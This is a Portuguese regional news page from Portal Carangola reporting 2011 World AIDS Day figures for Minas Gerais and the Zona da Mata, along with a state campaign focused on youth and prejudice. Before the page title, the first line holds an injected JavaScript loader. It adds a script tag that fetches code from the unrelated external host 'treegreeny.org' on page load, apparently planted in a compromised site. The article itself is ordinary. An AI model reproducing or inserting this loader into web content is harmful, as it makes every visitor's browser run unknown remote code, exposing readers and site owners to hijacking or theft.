;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Secretaria Estadual de Saúde lembra Dia Mundial de Luta Contra Aids Zona da Mata tem mais de 3 mil casos notificados - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Secretaria Estadual de Saúde lembra Dia Mundial de Luta Contra Aids Zona da Mata tem mais de 3 mil casos notificados

Nesta quinta-feira, 1º de dezembro, é lembrado o Dia Mundial de Luta Contra a Aids e dados da Secretaria de Estado de Saúde (SES-MG) apontam que, em Minas Gerais, até novembro de 2011, são 30.889 casos notificados. Na Zona da Mata, são cerca de 3.100 casos notificados. Na região, Juiz de Fora é o município com maior número de casos, são 2.194. A cidade figura, ainda, como a segunda de Minas, perdendo apenas para Belo Horizonte.
Com o slogan “A Aids não faz escolhas, mas você pode fazer a sua. Use camisinha”, a SES reforça a necessidade de se discutir questões relacionadas à vulnerabilidade à aids entre jovens e entre pessoas vivendo com HIV/aids. Também busca uma sociedade mais solidária, sem preconceito e tolerante à diversidade sexual.
De acordo com a coordenadora estadual de DST/Aids, Fernanda Junqueira, o foco da campanha deste ano são os jovens e o preconceito. “Em ambos os sexos a predominância do acometimento é na faixa etária de 20 a 49 anos, que corresponde a mais de 80% do total de casos do Estado”, falou. Outros dados apontam que na faixa etária que vai de 20 a 34 anos são 13.913 casos notificados (45%) e na faixa etária que vai dos 35 a 49 anos, 11.953 casos (39%).
“A discriminação, em muitos casos, vem acompanhada de insultos e acusações. E isso acontece mesmo quando sabemos que o HIV pode alcançar todos os grupos populacionais, independentemente de suas orientações sexuais e condições sociais ou econômicas. Esse cenário é hoje o grande desafio a ser superado para que medidas preventivas e de cuidados possam ser adotadas, estimulando a reflexão contra o preconceito”, comentou Fernanda.
Apesar das grandes cidades concentrarem o maior número de casos, como Belo Horizonte, que atualmente registra 8.206, observa-se a tendência de interiorização da Aids, com mais municípios a cada ano tendo registros. Em 2004, foram 586 municípios. Hoje, 701 já apresentaram registros de casos.

Informação: SEGOV

Ofertas

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.